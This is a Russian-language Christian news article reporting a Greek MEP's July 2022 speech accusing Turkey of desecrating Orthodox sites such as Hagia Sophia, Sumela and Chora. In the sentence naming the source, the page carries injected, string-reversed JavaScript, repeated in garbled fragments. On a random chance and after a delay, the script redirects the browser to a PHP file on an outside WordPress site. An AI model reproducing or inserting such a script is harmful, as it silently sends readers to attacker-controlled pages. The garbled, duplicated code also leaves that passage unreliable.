О попрании христианских святынь в Турции

Депутат Европарламента от Греции заявила о попрании православных святынь в Турции и призвала защитить их, напомнив коллегам, что они не только европейцы, но и христиане.

4 июля 2022 года депутат от Греции в Европейском парламенте Анна-Мишель Асимакопулу рассказала о попрании православных святынь в Турции, сообщает $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to=http%3A%2F%2Forthodoxianewsagency.gr&post=-211033306_2221&cc_key=» target=»_blank» rel=»noreferrer noopener»>orthodoxianewsagency.gr.

Депутат указала на неуважительное отношение со стороны турецких властей к собору Святой Софии в Стамбуле, объекту Всемирного наследия ЮНЕСКО и одному из величайших символов христианства. Однако, по словам Асимакопулу, речь идет «не только о разрушении мраморного пола, стен и исторических имперских ворот собора после его официального преобразования в мечеть». Турция, по словам депутата, целенаправленно разрушает и оскверняет христианские святыни и памятники.

Асимакопулу рассказала об «осквернении дискотеками и съемками голливудских фильмов» действующего православного монастыря Панагия Сумела, места паломничества верующих, и о превращении монастыря Хора, культового византийского памятника с многовековой историей, в исламскую мечеть. По словам Асимакопулу, «такова постоянная политика Турции, направленная против православных центров паломничества».

Анна-Мишель Асимакопулу подчеркнула, что подобные действия Турции оскорбляют европейскую культуру, очерняют и искажают принципы и ценности христианства и православия, подрывают европейскую идентичность.

«Ввиду этих провокационных действий я прошу вашей поддержки в защите нашего культурного наследия не только как европейцев, но и как христиан», – призвала депутат от Греции.

Источник

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Открытая семинарияTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, ВКонтакте

4.3/5

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.